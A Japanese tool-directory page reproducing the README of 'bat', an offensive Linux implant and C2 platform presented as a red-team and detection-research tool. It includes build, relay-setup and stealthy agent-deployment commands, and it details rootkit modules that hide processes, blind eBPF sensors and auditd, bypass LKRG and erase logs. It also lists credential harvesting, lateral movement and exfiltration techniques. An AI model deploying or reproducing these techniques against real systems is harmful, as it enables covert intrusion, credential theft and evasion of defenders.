Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
bat — 全スペクトルLinux攻撃者シミュレーションプラットフォーム。カーネルレベルのステルス性、C2ビーコン通信、権限昇格、認証情報収集、横展開、アーティファクト破壊を備えています。レッドチームの運用および検知研究向けに設計されています。 | Kitploit
ツール/GitHubGitHub/rhzv0/bat
特権昇格永続化メカニズム横移動データ流出ポストエクスプロイトコマンド&コントロールレッドチーミングペイロード開発
GitHubrhzv0/bat

bat

全スペクトルLinux攻撃者シミュレーションプラットフォーム。カーネルレベルのステルス性、C2ビーコン通信、権限昇格、認証情報収集、横展開、アーティファクト破壊を備えています。レッドチームの運用および検知研究向けに設計されています。

リポジトリを見る
364184ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Behavioral Adversary Tracer (BAT)

バナー0

BAT は、Linux と Windows 向けの現実的で進化する敵対的脅威モデルです。これは C2 フレームワークでもルートキットでもありません。C2 通信、カーネルレベルのステルスルートキットモジュール、ユーザースペース回避、権限昇格、永続化、プロセスインジェクション、認証情報収集、データ流出、横展開を単一の統合された敵対者にまとめた完全な脅威シミュレーションプラットフォームです。設計目標は、2026 年に達成可能な最も高度で現実的な Linux 脅威となることであり、現在の検出システムが何を捕捉するかとは独立しています。

これは研究ペアの攻撃者側です。Aura フレームワークは Bat を検出するために進化します。Bat は Aura を回避するために進化します。攻撃者は検出システムに制約されることはありません。


スクリーンショット

クイックスタート

1. 前提条件```bash

apt install nasm gcc-x86_64-linux-gnu binutils-x86_64-linux-gnu golang-go go install mvdan.cc/garble@latest

### 2. 設定```bash
cp build.env.example build.env
nano build.env      # RELAY_IP, SECRET, BAT_KEY, CDN_DOMAIN

シークレットを生成: openssl rand -hex 16

3. ビルド```bash

./build.sh # garble agent (x86_64+arm64) + server (arm64) + netshell ./build.sh agent # agent only ./build.sh server # server arm64 only (EC2 / Mac M-series) ./build.sh server-amd64 # server x86_64 only (PC Intel/AMD) ./build.sh netshell # netshell only

バイナリは `bin/` に配置されます。

### 4. リレーのブートストラップ```bash
# on the relay VPS (as root)
sudo bash -s -- --tg-token $TG_TOKEN --tg-chat-id $TG_CHAT_ID < relay/setup.sh

# from the operator machine
source build.env
relay/sync.sh ubuntu@$RELAY_IP --key $BAT_KEY --restart-kcc --tg
scp -i $BAT_KEY bin/netshell-v11-{x86_64,arm64} ubuntu@$RELAY_IP:/var/www/nexus/agents/

5. 実行```bash

./bin/bat-server-v11-arm64 # tunnel starts automatically, no flags needed

ターゲットにエージェントを展開する:```bash
sudo setsid /path/to/bat-agent-v11-x86_64 </dev/null >/tmp/.log 2>&1 &
disown

Agent appears in bat-server as <agentID>@<hostname> within one beacon interval (default 30s).


Linux Stealth Layer: Singularity

The kernel stealth layer (bat-stealth.ko, source in kperf-qos/) is built directly on top of Singularity, an advanced kernel rootkit research framework. Four core modules were ported and adapted:

bpf_hook: Intercepts bpf(2) and all eBPF communication primitives. Any eBPF sensor receives zero telemetry for hidden PIDs. Adapted: ARCH_SYS("bpf") replaces the x86-only __x64_sys_bpf; __ia32_sys_bpf removed for ARM64; HIDDEN_PORT replaced by a sysfs-configurable global.

hiding_fs: Complete filesystem erasure: getdents64/getdents filtering, stat/statx/newfstatat nlink adjustment, openat/access/faccessat /proc/<pid> blocking, chdir and readlink blocking. Merged from five Singularity modules (hiding_directory, hiding_stat, open, hiding_chdir, hiding_readlink). Adapted: REGS_ARGn macros replace direct register access; should_hide_path() extended for runtime-configured bat_hidden_paths[].

hide_module: Removes bat-stealth.ko from all kernel module lists. Extended: Singularity already saves list.prev; this version saves both list.prev and list.next and poisons both to block traversal in either direction. Added module_unhide() for reversible removal, required by K-99 before delete_module(2) can locate the module by name.

lkrg_bypass: Suppresses LKRG enforcement for hidden processes: hooks signal delivery to block SIGKILL for hidden tasks, hooks vprintk_emit to drop LKRG log messages, disables UMH validation during agent execution. Ported directly with no architectural changes.

The following modules were developed independently:

  • become_root: signal 59 hook that calls commit_creds(prepare_kernel_cred(NULL)) to grant uid=0 (K-03)
  • selfdefense: blocks LiME memory acquisition, hides kallsyms entries, blocks kprobes on agent symbols, re-hides the module on any enumeration attempt
  • audit: suppresses auditd events for hidden PIDs
  • sysrq_hook: intercepts SysRq-T to exclude hidden processes from task dumps
  • taskstats_hook: filters NETLINK taskstats responses for hidden PIDs
  • reset_tainted + clear_taint_dmesg: zeroes /proc/sys/kernel/tainted and filters dmesg lines containing module load evidence
  • hooks_write: intercepts all kernel write paths (write/splice/sendfile/tee + io_uring_enter/enter2 + ia32 compat) to drop log entries matching agent strings before they reach syslog or journald
  • pid_manager: fork tracepoint to maintain the hidden PID set across child processes

The full stack makes the agent and all its artifacts invisible to: ps, top, ss, netstat, lsof, filesystem traversal on hidden paths, lsmod, sysfs, kallsyms, auditd, all eBPF sensors, LKRG, LiME, and SysRq forensics.


MITRE ATT&CK Coverage

ATT&CK IDTechniqueBat Implementation
T1036.005Masquerading: Match Legitimate NameTTP 1: prctl(PR_SET_NAME) to kworker/0:1
T1055Process InjectionTTP 11: shellcode + rawsock thread injected into live process
T1205.001Traffic Signaling (Magic Packet)UDP/ICMP trigger wakes agent from dormancy
T1071.001Web Protocols C2HTTPS beacons over :443 or :9443
T1573.001Encrypted Channel: SymmetricHMAC-SHA256 authenticated beacons over TLS
T1090.004Proxy: Domain FrontingCDN profile routes agent traffic through an edge proxy layer
T1574.006Hijack Execution: LD_PRELOADTTP 10: bat-rootkit.so via /etc/ld.so.preload
T1014Rootkitbat-stealth.ko: hides PIDs, ports, files, module, self
T1562.001Impair Defenses: Disable Toolsbpf_hook blinds eBPF sensors; lkrg_bypass disables LKRG
T1562.012Impair Defenses: Disable Linux Auditaudit module suppresses auditd events for hidden PIDs
T1068Privilege Escalation via ExploitationK-03: signal 59 triggers commit_creds to uid=0
T1543.002Create/Modify System Process: SystemdTTP 6: systemd unit persistence
T1053.003Scheduled Task: CronTTP 6: crontab persistence
T1070.002Clear Linux Logsclear_taint_dmesg filters dmesg; reset_tainted zeroes taint flag; hooks_write drops log entries in-kernel
T1070.004Indicator Removal: File DeletionTTP 222 destruct: full artifact wipe
T1003Credential DumpingTTP 7/23: /etc/shadow, shell history, env secrets
T1552.004Unsecured Credentials: Private KeysTTP 21: SSH keys, known_hosts, configs
T1552.005Cloud Instance MetadataTTP 23: AWS IMDS credential harvest
T1018Remote System DiscoveryTTP 20/34: ARP enumeration + /16 CIDR scan
T1046Network Service ScanningTTP 20/34: TCP port scan of discovered hosts
T1021.004Lateral Movement via SSHTTP 22/35: SCP self to discovered host, exec detached
T1078Valid AccountsTTP 22/35: lateral move uses harvested SSH keys
T1048Exfiltration Over Alternative ProtocolTTP 30/31/32: file and directory exfil over beacon channel
T1059.004Unix Shell ExecutionTTP 4: arbitrary command execution
T1027Obfuscated Files or Informationgarble -literals -tiny -seed=random; XOR(0x5A) config encoding
T1620Reflective Code LoadingTTP 11: shellcode executed in target process address space; bat-stealth.ko loaded via memfd_create

Architecture```

Target Relay (VPS) Operator (local)

bat-agent --HTTPS:443--> nginx:443 -> :8443 --tunnel--> bat-server:9443 --TCP:9443 --> sshd:9443 --tunnel--> --UDP/ICMP --> (trigger forwarded)

ツールをダウンロード